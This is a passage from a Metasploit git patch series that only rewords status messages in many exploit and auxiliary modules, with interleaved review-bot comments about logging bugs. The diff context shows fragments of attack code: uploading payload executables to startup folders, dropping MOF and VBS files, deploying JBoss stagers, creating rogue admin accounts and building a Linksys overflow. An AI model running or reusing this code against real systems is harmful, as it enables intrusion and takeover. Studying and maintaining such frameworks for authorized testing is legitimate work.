@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/") end - print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_status("Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") begin m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) rescue RbMysql::AccessDeniedError @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}" exe = generate_payload_exe - print_status("#{peer} - Uploading to '#{dest}'") + print_status("Uploading to '#{dest}'") begin upload_file(exe, dest) rescue RbMysql::AccessDeniedError diff --git a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb index fd2883bd84..79b9157845 100644 --- a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb +++ b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb @@ -104,13 +104,13 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Generating VBS file...") mof_content = generate_mof("#{@var_mof_name}.mof", "#{@var_vbs_name}.vbs") - print_status("#{peer} - Uploading the VBS file") + print_status("Uploading the VBS file") worked = upload_file("WINDOWS\\system32\\#{@var_vbs_name}.vbs", vbs_content) unless worked fail_with(Failure::NotVulnerable, "Failed to upload the file") end - print_status("#{peer} - Uploading the MOF file") + print_status("Uploading the MOF file") upload_file("WINDOWS\\system32\\wbem\\mof\\#{@var_mof_name}.mof", mof_content) end 
@@ -132,9 +132,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.include? "<RESULT><VERSION>1</VERSION><STATUS>0</STATUS></RESULT>" - print_warning("#{peer} - File successfully uploaded: #{filename}") + print_warning("File successfully uploaded: #{filename}") else - print_error("#{peer} - Failed to upload the file") + print_error("Failed to upload the file") return false end diff --git a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb index 5b423dfa65..451686637c 100644 --- a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb +++ b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb @@ -270,7 +270,7 @@ End Sub end def execute_bcl(i) - print_status("#{peer} - Executing BCL code #{@basename}#{i}.bcl to drop final payload...") + print_status("Executing BCL code #{@basename}#{i}.bcl to drop final payload...") uri = normalize_uri(target_uri.to_s, "CimWeb", "gefebt.exe") uri << "?#{@exploit_unc}#{@share_name}\\#{@basename}#{i}.bcl" @@ -280,12 +280,12 @@ End Sub # We use res.to_s because the embedded CIMPLICITY Web server doesn't # answer with valid HTTP responses. if res and res.code == 200 and res.to_s =~ /(^Error.*$)/ - print_error("#{peer} - Server answered with error: $1") + print_error("Server answered with error: $1") fail_with(Failure::Unknown, "#{peer} - Server answered with error") elsif res and res.code == 200 and res.to_s =~ /No such file or directory/ fail_with(Failure::BadConfig, "#{peer} - The target wasn't able to access the remote BCL file") elsif res and res.code == 200 - print_good("#{peer} - '200 OK' answer indicates success!") + print_good("'200 OK' answer indicates success!") else fail_with(Failure::Unknown, "#{peer} - Unknown error") end 
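Review bot: In the `-132,9` hunk of file_reporter_fsfui_upload.rb the success branch reports `File successfully uploaded` through `print_warning`, while the other upload paths in this patch (for example ms10_104_sharepoint.rb) report the same outcome with `print_good`. If the warning level is not deliberate, `print_good("File successfully uploaded: #{filename}")` would keep the output consistent and make real warnings easier to spot. If it is deliberate, a short comment saying why would help. The method containing this branch starts outside the hunk.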
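Review bot: In the `-280,12` hunk of ge_proficy_cimplicity_gefebt.rb the rewritten line `print_error("Server answered with error: $1")` prints the literal text `$1`, because Ruby does not interpolate a bare global inside a double-quoted string. The server's error text captured by `res.to_s =~ /(^Error.*$)/` on the line above is therefore never shown to the operator. Use `print_error("Server answered with error: #{$1}")`, or `Regexp.last_match(1)` in place of `$1`. `execute_bcl` begins in the previous hunk and its end is not visible in this one.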
@@ -296,7 +296,7 @@ End Sub execute_bcl(i) end - print_status("#{peer} - Executing #{@exe_filename}...") + print_status("Executing #{@exe_filename}...") uri = normalize_uri(target_uri.to_s, "CimWeb", @exe_filename) uri << "?" diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index 362dd6e87d..7b7c816897 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Execute the powershell command - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") begin psexec(command) rescue StandardError => exec_command_error diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb index 0c45d00c83..17727557a0 100644 --- a/modules/exploits/windows/smb/psexec_psh.rb +++ b/modules/exploits/windows/smb/psexec_psh.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}") end # Execute the powershell command - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") begin return psexec(command) rescue StandardError => exec_command_error From 8094eb631b93e80dc68a94d6cd5deb220a4c25aa Mon Sep 17 00:00:00 2001 
From: James Lee <egypt@metasploit.com> Date: Mon, 1 Feb 2016 16:06:34 -0600 Subject: [PATCH 33/71] Do the same for aux modules --- .../admin/hp/hp_imc_som_create_account.rb | 22 +++---- .../admin/http/axigen_file_access.rb | 28 ++++----- .../auxiliary/admin/http/iis_auth_bypass.rb | 6 +- .../admin/http/intersil_pass_reset.rb | 20 +++--- .../auxiliary/admin/http/jboss_bshdeployer.rb | 26 ++++---- .../http/jboss_deploymentfilerepository.rb | 26 ++++---- .../admin/http/kaseya_master_admin.rb | 8 +-- .../http/linksys_tmunblock_admin_reset_bof.rb | 22 +++---- .../http/manage_engine_dc_create_admin.rb | 4 +- .../admin/http/manageengine_dir_listing.rb | 14 ++--- .../admin/http/manageengine_file_download.rb | 16 ++--- .../admin/http/manageengine_pmp_privesc.rb | 14 ++--- .../admin/http/mutiny_frontend_read_delete.rb | 24 +++---- .../admin/http/netflow_file_download.rb | 10 +-- .../http/netgear_soap_password_extractor.rb | 20 +++--- .../http/novell_file_reporter_filedelete.rb | 6 +- .../admin/http/sophos_wpa_traversal.rb | 12 ++-- .../auxiliary/admin/http/sysaid_admin_acct.rb | 4 +- .../admin/http/sysaid_file_download.rb | 8 +-- .../auxiliary/admin/http/sysaid_sql_creds.rb | 2 +- .../admin/http/vbulletin_upgrade_admin.rb | 8 +-- .../admin/http/wp_custom_contact_forms.rb | 12 ++-- .../http/wp_easycart_privilege_escalation.rb | 26 ++++---- .../http/wp_wplms_privilege_escalation.rb | 20 +++--- .../admin/misc/sercomm_dump_config.rb | 22 +++---- .../mssql/mssql_enum_domain_accounts_sqli.rb | 28 ++++----- .../mssql/mssql_escalate_dbowner_sqli.rb | 32 +++++----- .../mssql/mssql_escalate_execute_as_sqli.rb | 36 +++++------ .../advantech_webaccess_dbvisitor_sqli.rb | 10 +-- modules/auxiliary/admin/smb/psexec_command.rb | 24 +++---- .../auxiliary/admin/smb/psexec_ntdsgrab.rb | 48 +++++++------- .../admin/webmin/edit_html_fileaccess.rb | 14 ++--- .../dos/http/apache_commons_fileupload_dos.rb | 2 +- .../dos/http/f5_bigip_apm_max_sessions.rb | 22 +++---- 
.../dos/http/ms15_034_ulonglongadd.rb | 10 +-- .../dos/http/novell_file_reporter_heap_bof.rb | 8 +-- .../dos/http/rails_json_float_dos.rb | 16 ++--- .../dos/http/wordpress_long_password_dos.rb | 16 ++--- .../dos/http/wordpress_xmlrpc_dos.rb | 18 +++--- .../dos/misc/ibm_sametime_webplayer_dos.rb | 48 +++++++------- .../gather/alienvault_iso27001_sqli.rb | 16 ++--- .../gather/alienvault_newpolicyform_sqli.rb | 20 +++--- .../auxiliary/gather/coldfusion_pwd_props.rb | 12 ++-- .../gather/doliwamp_traversal_creds.rb | 34 +++++----- modules/auxiliary/gather/drupal_openid_xxe.rb | 14 ++--- modules/auxiliary/gather/eaton_nsm_creds.rb | 8 +-- .../gather/f5_bigip_cookie_disclosure.rb | 18 +++--- .../auxiliary/gather/hp_snac_domain_creds.rb | 12 ++-- modules/auxiliary/gather/huawei_wifi_info.rb | 18 +++--- .../gather/ibm_sametime_enumerate_users.rb | 38 ++++++------ .../gather/ibm_sametime_room_brute.rb | 14 ++--- .../auxiliary/gather/ibm_sametime_version.rb | 10 +-- modules/auxiliary/gather/java_rmi_registry.rb | 20 +++--- .../gather/konica_minolta_pwd_extract.rb | 10 +-- .../auxiliary/gather/memcached_extractor.rb | 12 ++-- .../auxiliary/gather/mybb_db_fingerprint.rb | 16 ++--- .../auxiliary/gather/vbulletin_vote_sqli.rb | 16 ++--- .../gather/wp_all_in_one_migration_export.rb | 4 +- .../wp_ultimate_csv_importer_user_extract.rb | 8 +-- .../gather/xerox_workcentre_5xxx_ldap.rb | 32 +++++----- .../auxiliary/scanner/couchdb/couchdb_enum.rb | 6 +- .../scanner/elasticsearch/indices_enum.rb | 10 +-- .../a10networks_ax_directory_traversal.rb | 10 +-- .../scanner/http/apache_mod_cgi_bash_env.rb | 2 +- .../http/bitweaver_overlay_type_traversal.rb | 12 ++-- .../auxiliary/scanner/http/cisco_asa_asdm.rb | 18 +++--- .../auxiliary/scanner/http/cisco_ssl_vpn.rb | 26 ++++---- .../scanner/http/cisco_ssl_vpn_priv_esc.rb | 32 +++++----- .../scanner/http/clansphere_traversal.rb | 8 +-- .../auxiliary/scanner/http/dolibarr_login.rb | 16 ++--- .../scanner/http/drupal_views_user_enum.rb | 4 +- 
.../scanner/http/elasticsearch_traversal.rb | 10 +-- .../scanner/http/etherpad_duo_login.rb | 16 ++--- .../auxiliary/scanner/http/f5_mgmt_scanner.rb | 16 ++--- .../auxiliary/scanner/http/gitlab_login.rb | 4 +- .../scanner/http/goahead_traversal.rb | 4 +- .../scanner/http/hp_imc_som_file_download.rb | 8 +-- ...hp_sitescope_getfileinternal_fileaccess.rb | 20 +++--- .../hp_sitescope_getsitescopeconfiguration.rb | 18 +++--- ...hp_sitescope_loadfilecontent_fileaccess.rb | 12 ++-- .../scanner/http/hp_sys_mgmt_login.rb | 8 +-- .../auxiliary/scanner/http/influxdb_enum.rb | 16 ++--- .../auxiliary/scanner/http/jenkins_enum.rb | 24 +++---- .../http/joomla_ecommercewd_sqli_scanner.rb | 4 +- .../http/joomla_gallerywd_sqli_scanner.rb | 6 +- .../auxiliary/scanner/http/joomla_pages.rb | 10 +-- .../auxiliary/scanner/http/joomla_plugins.rb | 20 +++--- .../manageengine_deviceexpert_user_creds.rb | 14 ++--- .../manageengine_securitymanager_traversal.rb | 8 +-- .../http/ms15_034_http_sys_memory_dump.rb | 6 +- .../scanner/http/netgear_sph200d_traversal.rb | 14 ++--- .../novell_file_reporter_fsfui_fileaccess.rb | 6 +- .../novell_file_reporter_srs_fileaccess.rb | 6 +- .../scanner/http/ntlm_info_enumeration.rb | 6 +- .../scanner/http/openmind_messageos_login.rb | 16 ++--- ...acle_demantra_database_credentials_leak.rb | 8 +-- .../scanner/http/oracle_ilom_login.rb | 16 ++--- .../auxiliary/scanner/http/pocketpad_login.rb | 16 ++--- .../scanner/http/radware_appdirector_enum.rb | 16 ++--- .../auxiliary/scanner/http/rips_traversal.rb | 4 +- .../auxiliary/scanner/http/s40_traversal.rb | 10 +-- .../http/servicedesk_plus_traversal.rb | 10 +-- .../scanner/http/smt_ipmi_49152_exposure.rb | 8 +-- .../scanner/http/smt_ipmi_cgi_scanner.rb | 14 ++--- .../http/smt_ipmi_url_redirect_traversal.rb | 18 +++--- ...support_center_plus_directory_traversal.rb | 28 ++++----- .../http/symantec_brightmail_logfile.rb | 12 ++-- .../scanner/http/typo3_bruteforce.rb | 8 +-- modules/auxiliary/scanner/http/vcms_login.rb | 
10 +-- .../scanner/http/wildfly_traversal.rb | 6 +- .../http/wordpress_cp_calendar_sqli.rb | 6 +- .../scanner/http/wordpress_ghost_scanner.rb | 8 +-- .../scanner/http/wordpress_xmlrpc_login.rb | 2 +- .../http/wp_contus_video_gallery_sqli.rb | 6 +- .../scanner/http/wp_dukapress_file_read.rb | 4 +- .../http/wp_gimedia_library_file_read.rb | 4 +- .../http/wp_mobile_pack_info_disclosure.rb | 6 +- .../http/wp_mobileedition_file_read.rb | 4 +- .../http/wp_nextgen_galley_file_read.rb | 16 ++--- .../http/wp_simple_backup_file_read.rb | 6 +- .../http/wp_subscribe_comments_file_read.rb | 20 +++--- .../auxiliary/scanner/misc/java_rmi_server.rb | 8 +-- .../scanner/misc/sunrpc_portmapper.rb | 4 +- .../scanner/mysql/mysql_file_enum.rb | 22 +++---- .../auxiliary/scanner/redis/redis_server.rb | 6 +- .../auxiliary/scanner/rsync/modules_list.rb | 20 +++--- .../scanner/sap/sap_mgmt_con_brute_login.rb | 2 +- .../scanner/smb/psexec_loggedin_users.rb | 28 ++++----- .../auxiliary/scanner/smb/smb_uninit_cred.rb | 8 +-- modules/auxiliary/scanner/smtp/smtp_relay.rb | 24 +++---- modules/auxiliary/scanner/ssl/openssl_ccs.rb | 14 ++--- .../scanner/ssl/openssl_heartbleed.rb | 62 +++++++++---------- .../voip/cisco_cucdm_call_forward.rb | 14 ++--- .../auxiliary/voip/cisco_cucdm_speed_dials.rb | 36 +++++------ 134 files changed, 987 insertions(+), 987 deletions(-) diff --git a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb index 1941291594..3f21a39c33 100644 --- a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb +++ b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb 
@@ -99,21 +99,21 @@ class Metasploit3 < Msf::Auxiliary def run - print_status("#{peer} - Trying to find the service desk service strong name...") + print_status("Trying to find the service desk service strong name...") service_desk = get_service_desk_strong_name if service_desk.nil? - print_error("#{peer} - service desk service not found.") + print_error("service desk service not found.") return end - print_good("#{peer} - service desk strong number found: #{service_desk}") + print_good("service desk strong number found: #{service_desk}") - print_status("#{peer} - Trying to find the AccountService strong name...") + print_status("Trying to find the AccountService strong name...") account_service = get_account_service_strong_name(service_desk) if account_service.nil? - print_error("#{peer} - AccountService service not found.") + print_error("AccountService service not found.") return end - print_good("#{peer} - AccountService strong number found: #{account_service}") + print_good("AccountService strong number found: #{account_service}") header= "6|0|39" # version | unknown | string_table size @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Auxiliary service_url = ssl ? "https://" : "http://" service_url << "#{rhost}:#{rport}/servicedesk/servicedesk/" - print_status("#{peer} - Trying to create account #{datastore["USERNAME"]}...") + print_status("Trying to create account #{datastore["USERNAME"]}...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("servicedesk", "servicedesk", "accountSerivce.gwtsvc"), 
@@ -247,12 +247,12 @@ class Metasploit3 < Msf::Auxiliary }) unless res and res.code == 200 - print_error("#{peer} - Unknown error while creating the user.") + print_error("Unknown error while creating the user.") return end if res.body =~ /Username.*already exists/ - print_error("#{peer} - The user #{datastore["USERNAME"]} already exists.") + print_error("The user #{datastore["USERNAME"]} already exists.") return elsif res.body =~ /Account.*added successfully/ login_url = ssl ? "https://" : "http://" @@ -267,8 +267,8 @@ class Metasploit3 < Msf::Auxiliary proof: "#{login_url}\n#{res.body}" ) - print_good("#{peer} - Account #{datastore["USERNAME"]}/#{datastore["PASSWORD"]} created successfully.") - print_status("#{peer} - Use it to log into #{login_url}") + print_good("Account #{datastore["USERNAME"]}/#{datastore["PASSWORD"]} created successfully.") + print_status("Use it to log into #{login_url}") end end diff --git a/modules/auxiliary/admin/http/axigen_file_access.rb b/modules/auxiliary/admin/http/axigen_file_access.rb index 7b4925a4ca..6e6a7939a0 100644 --- a/modules/auxiliary/admin/http/axigen_file_access.rb +++ b/modules/auxiliary/admin/http/axigen_file_access.rb @@ -51,11 +51,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Trying to login") + print_status("Trying to login") if login - print_good("#{peer} - Login successful") + print_good("Login successful") else - print_error("#{peer} - Login failed, review USERNAME and PASSWORD options") + print_error("Login failed, review USERNAME and PASSWORD options") return end @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary @traversal.gsub!(/\//, "\\") file.gsub!(/\//, "\\") else # unix - print_error("#{peer} - *nix platform detected, vulnerability is only known to work on Windows") + print_error("*nix platform detected, vulnerability is only known to work on Windows") return end 
@@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary def read_file(file) - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi( { @@ -96,14 +96,14 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 store_path = store_loot("axigen.webadmin.data", "application/octet-stream", rhost, res.body, file) - print_good("#{peer} - File successfully retrieved and saved on #{store_path}") + print_good("File successfully retrieved and saved on #{store_path}") else - print_error("#{peer} - Failed to retrieve file") + print_error("Failed to retrieve file") end end def delete_file(file) - print_status("#{peer} - Deleting file #{file}") + print_status("Deleting file #{file}") res = send_request_cgi( { @@ -119,14 +119,14 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /View Log Files/ - print_good("#{peer} - File #{file} deleted") + print_good("File #{file} deleted") else - print_error("#{peer} - Error deleting file #{file}") + print_error("Error deleting file #{file}") end end def get_platform - print_status("#{peer} - Retrieving platform") + print_status("Retrieving platform") res = send_request_cgi( { @@ -140,15 +140,15 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 if res.body =~ /Windows/ - print_good("#{peer} - Windows platform found") + print_good("Windows platform found") return 'windows' elsif res.body =~ /Linux/ - print_good("#{peer} - Linux platform found") + print_good("Linux platform found") return 'unix' end end - print_warning("#{peer} - Platform not found, assuming UNIX flavor") + print_warning("Platform not found, assuming UNIX flavor") return 'unix' end diff --git a/modules/auxiliary/admin/http/iis_auth_bypass.rb b/modules/auxiliary/admin/http/iis_auth_bypass.rb index 4601c36955..0d999c859a 100644 --- a/modules/auxiliary/admin/http/iis_auth_bypass.rb 
+++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb @@ -77,16 +77,16 @@ class Metasploit3 < Msf::Auxiliary def run if not has_auth - print_error("#{peer} - No basic authentication enabled") + print_error("No basic authentication enabled") return end bypass_string = try_auth if bypass_string.empty? - print_error("#{peer} - The bypass attempt did not work") + print_error("The bypass attempt did not work") else - print_good("#{peer} - You can bypass auth by doing: #{bypass_string}") + print_good("You can bypass auth by doing: #{bypass_string}") end end diff --git a/modules/auxiliary/admin/http/intersil_pass_reset.rb b/modules/auxiliary/admin/http/intersil_pass_reset.rb index 335c0e050d..036a3ee2cc 100644 --- a/modules/auxiliary/admin/http/intersil_pass_reset.rb +++ b/modules/auxiliary/admin/http/intersil_pass_reset.rb @@ -52,17 +52,17 @@ class Metasploit3 < Msf::Auxiliary }) if (res and (m = res.headers['Server'].match(/Boa\/(.*)/))) - vprint_status("#{peer} - Boa Version Detected: #{m[1]}") + vprint_status("Boa Version Detected: #{m[1]}") return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version return Exploit::CheckCode::Safe if (m[1][3].ord-48>4) return Exploit::CheckCode::Vulnerable else - vprint_status("#{peer} - Not a Boa Server!") + vprint_status("Not a Boa Server!") return Exploit::CheckCode::Safe # not a boa server end rescue Rex::ConnectionRefused - print_error("#{peer} - Connection refused by server.") + print_error("Connection refused by server.") return Exploit::CheckCode::Safe end end 
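Review bot: In the `-52,17` hunk of intersil_pass_reset.rb the condition `res.headers['Server'].match(/Boa\/(.*)/)` calls `match` directly on the header value, so a response without a `Server` header would presumably raise `NoMethodError` on nil. The only rescue visible here is for `Rex::ConnectionRefused`, so the check would abort instead of returning `CheckCode::Safe`. Coercing first avoids that: `if (res and (m = res.headers['Server'].to_s.match(/Boa\/(.*)/)))`. The indexed reads `m[1][0].ord` and `m[1][3].ord` have the same problem when the version string is shorter than four characters. The enclosing method starts outside the hunk.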
@@ -80,14 +80,14 @@ class Metasploit3 < Msf::Auxiliary }) if res.nil? - print_error("#{peer} - The server may be down") + print_error("The server may be down") return elsif res and res.code != 401 - print_status("#{peer} - #{uri} does not have basic authentication enabled") + print_status("#{uri} does not have basic authentication enabled") return end - print_status("#{peer} - Server still operational. Checking to see if password has been overwritten") + print_status("Server still operational. Checking to see if password has been overwritten") res = send_request_cgi({ 'uri' => uri, 'method'=> 'GET', @@ -95,17 +95,17 @@ class Metasploit3 < Msf::Auxiliary }) if not res - print_error("#{peer} - Server timedout, will not continue") + print_error("Server timedout, will not continue") return end case res.code when 200 - print_good("#{peer} - Password reset successful with admin:#{datastore['PASSWORD']}") + print_good("Password reset successful with admin:#{datastore['PASSWORD']}") when 401 - print_error("#{peer} - Access forbidden. The password reset attempt did not work") + print_error("Access forbidden. The password reset attempt did not work") else - print_status("#{peer} - Unexpected response: Code #{res.code} encountered") + print_status("Unexpected response: Code #{res.code} encountered") end end diff --git a/modules/auxiliary/admin/http/jboss_bshdeployer.rb b/modules/auxiliary/admin/http/jboss_bshdeployer.rb index 63883fbf56..1e1d9dbf8d 100644 --- a/modules/auxiliary/admin/http/jboss_bshdeployer.rb +++ b/modules/auxiliary/admin/http/jboss_bshdeployer.rb 
@@ -49,13 +49,13 @@ class Metasploit3 < Msf::Auxiliary encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '') if http_verb == 'POST' - print_status("#{peer} - Deploying payload...") + print_status("Deploying payload...") opts = { :file => "#{app_base}.war", :contents => encoded_payload } else - print_status("#{peer} - Deploying stager...") + print_status("Deploying stager...") stager_name = Rex::Text.rand_text_alpha(8 + rand(8)) stager_contents = stager_jsp(app_base) opts = { @@ -69,37 +69,37 @@ class Metasploit3 < Msf::Auxiliary package = deploy_bsh(bsh_payload) if package.nil? - print_error("#{peer} - Deployment failed") + print_error("Deployment failed") return else - print_good("#{peer} - Deployment successful") + print_good("Deployment successful") end unless http_verb == 'POST' # call the stager to deploy our real payload war stager_uri = '/' + stager_name + '/' + stager_name + '.jsp' payload_data = "#{Rex::Text.rand_text_alpha(8+rand(8))}=#{Rex::Text.uri_encode(encoded_payload)}" - print_status("#{peer} - Calling stager #{stager_uri} to deploy final payload...") + print_status("Calling stager #{stager_uri} to deploy final payload...") res = deploy('method' => 'POST', 'data' => payload_data, 'uri' => stager_uri) if res && res.code == 200 - print_good("#{peer} - Payload deployed") + print_good("Payload deployed") else - print_error("#{peer} - Failed to deploy final payload") + print_error("Failed to deploy final payload") end # Remove the stager - print_status("#{peer} - Removing stager...") + print_status("Removing stager...") files = {} files[:stager_jsp_name] = "#{stager_name}.war/#{stager_name}.jsp" files[:stager_base] = "#{stager_name}.war" delete_script = generate_bsh(:delete, files) res = deploy_package(delete_script, package) if res.nil? - print_error("#{peer} - Unable to remove Stager") + print_error("Unable to remove Stager") else - print_good("#{peer} - Stager successfully removed") + print_good("Stager successfully removed") end end 
@@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary def undeploy_action(app_base) # Undeploy the WAR and the stager if needed - print_status("#{peer} - Undeploying #{app_base} by deleting the WAR file via BSHDeployer...") + print_status("Undeploying #{app_base} by deleting the WAR file via BSHDeployer...") files = {} files[:app_base] = "#{app_base}.war" @@ -115,9 +115,9 @@ class Metasploit3 < Msf::Auxiliary package = deploy_bsh(delete_script) if package.nil? - print_error("#{peer} - Unable to remove WAR") + print_error("Unable to remove WAR") else - print_good("#{peer} - Successfully removed") + print_good("Successfully removed") end end diff --git a/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb b/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb index 64cbb4fa8b..a427ac2009 100644 --- a/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb +++ b/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb @@ -51,10 +51,10 @@ class Metasploit3 < Msf::Auxiliary stager_contents = stager_jsp_with_payload(app_base, encoded_payload) if http_verb == 'POST' - print_status("#{peer} - Deploying stager for the WAR file...") + print_status("Deploying stager for the WAR file...") res = upload_file(stager_base, stager_jsp_name, stager_contents) else - print_status("#{peer} - Deploying minimal stager to upload the payload...") + print_status("Deploying minimal stager to upload the payload...") head_stager_jsp_name = Rex::Text.rand_text_alpha(8+rand(8)) head_stager_contents = head_stager_jsp(stager_base, stager_jsp_name) head_stager_uri = "/" + stager_base + "/" + head_stager_jsp_name + ".jsp" 
@@ -79,20 +79,20 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::Unknown, "Failed to deploy") end - print_status("#{peer} - Calling stager to deploy the payload warfile (might take some time)") + print_status("Calling stager to deploy the payload warfile (might take some time)") stager_uri = '/' + stager_base + '/' + stager_jsp_name + '.jsp' stager_res = deploy('uri' => stager_uri, 'method' => 'GET') if res && res.code == 200 - print_good("#{peer} - Payload deployed") + print_good("Payload deployed") else - print_error("#{peer} - Failed to deploy final payload") + print_error("Failed to deploy final payload") end # Cleaning stagers - print_status("#{peer} - Undeploying stagers via DeploymentFileRepository.remove()...") - print_status("#{peer} - This might take some time, be patient...") if http_verb == "HEAD" + print_status("Undeploying stagers via DeploymentFileRepository.remove()...") + print_status("This might take some time, be patient...") if http_verb == "HEAD" delete_res = [] if head_stager_jsp_name delete_res << delete_file(stager_base + '.war', head_stager_jsp_name, '.jsp') 
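Review bot: In the `-79,20` hunk of jboss_deploymentfilerepository.rb the stager call is stored in `stager_res`, but the following check tests `res`, which was assigned earlier outside this hunk. As written, "Payload deployed" appears to reflect the earlier upload response rather than the stager request, so a failed stager call can still be reported as a success. The check should read `if stager_res && stager_res.code == 200`. The commit only rewords the two messages in that branch, so the condition is unchanged by it.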
@@ -101,28 +101,28 @@ class Metasploit3 < Msf::Auxiliary delete_res << delete_file('./', stager_base + '.war', '') delete_res.each do |res| if !res - print_warning("#{peer} - Unable to remove WAR [No Response]") + print_warning("Unable to remove WAR [No Response]") elsif (res.code < 200 || res.code >= 300) - print_warning("#{peer} - WARNING: Unable to remove WAR [#{res.code} #{res.message}]") + print_warning("WARNING: Unable to remove WAR [#{res.code} #{res.message}]") end end end # Undeploy the WAR and the stager if needed def undeploy_action(app_base) - print_status("#{peer} - Undeploying #{app_base} via DeploymentFileRepository.remove()...") + print_status("Undeploying #{app_base} via DeploymentFileRepository.remove()...") print_status("This might take some time, be patient...") if http_verb == "HEAD" res = delete_file('./', app_base + '.war', '') unless res - print_error("#{peer} - Unable to remove WAR (no response)") + print_error("Unable to remove WAR (no response)") return end if res.code < 200 || res.code >= 300 - print_error("#{peer} - Unable to remove WAR [#{res.code} #{res.message}]") + print_error("Unable to remove WAR [#{res.code} #{res.message}]") else - print_good("#{peer} - Successfully removed") + print_good("Successfully removed") end end diff --git a/modules/auxiliary/admin/http/kaseya_master_admin.rb b/modules/auxiliary/admin/http/kaseya_master_admin.rb index 5703684ca9..d7046167c7 100644 --- a/modules/auxiliary/admin/http/kaseya_master_admin.rb +++ b/modules/auxiliary/admin/http/kaseya_master_admin.rb 
@@ -53,11 +53,11 @@ class Metasploit3 < Msf::Auxiliary if res && res.body && res.body.to_s =~ /ID="sessionVal" name="sessionVal" value='([0-9]*)'/ session_val = $1 else - print_error("#{peer} - Failed to get sessionVal") + print_error("Failed to get sessionVal") return end - print_status("#{peer} - Got sessionVal #{session_val}, creating Master Administrator account") + print_status("Got sessionVal #{session_val}, creating Master Administrator account") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'LocalAuth', 'setAccount.aspx'), @@ -73,11 +73,11 @@ class Metasploit3 < Msf::Auxiliary }) unless res && res.code == 302 && res.body && res.body.to_s.include?('/vsapres/web20/core/login.asp') - print_error("#{peer} - Master Administrator account creation failed") + print_error("Master Administrator account creation failed") return end - print_good("#{peer} - Master Administrator account with credentials #{datastore['KASEYA_USER']}:#{datastore['KASEYA_PASS']} created") + print_good("Master Administrator account with credentials #{datastore['KASEYA_USER']}:#{datastore['KASEYA_PASS']} created") service_data = { address: rhost, port: rport, diff --git a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb index e3acc7bf4b..f5b371da2b 100644 --- a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb +++ b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb 
@@ -34,20 +34,20 @@ class Metasploit3 < Msf::Auxiliary end def check_login(user) - print_status("#{peer} - Trying to login with #{user} and empty password") + print_status("Trying to login with #{user} and empty password") res = send_request_cgi({ 'uri' => '/', 'method' => 'GET', 'authorization' => basic_auth(user,"") }) if res.nil? || res.code == 404 - print_status("#{peer} - No login possible with #{user} and empty password") + print_status("No login possible with #{user} and empty password") return false elsif [200, 301, 302].include?(res.code) - print_good("#{peer} - Successful login #{user} and empty password") + print_good("Successful login #{user} and empty password") return true else - print_status("#{peer} - No login possible with #{user} and empty password") + print_status("No login possible with #{user} and empty password") return false end end @@ -56,15 +56,15 @@ class Metasploit3 < Msf::Auxiliary begin if check_login("admin") - print_good("#{peer} - login with user admin and no password possible. There is no need to use this module.") + print_good("login with user admin and no password possible. There is no need to use this module.") return end rescue ::Rex::ConnectionError - print_error("#{peer} - Failed to connect to the web server") + print_error("Failed to connect to the web server") return end - print_status("#{peer} - Resetting password for the admin user ...") + print_status("Resetting password for the admin user ...") postdata = Rex::Text.rand_text_alpha(246) # Filler postdata << [0x81544AF0].pack("N") # $s0, address of admin password in memory 
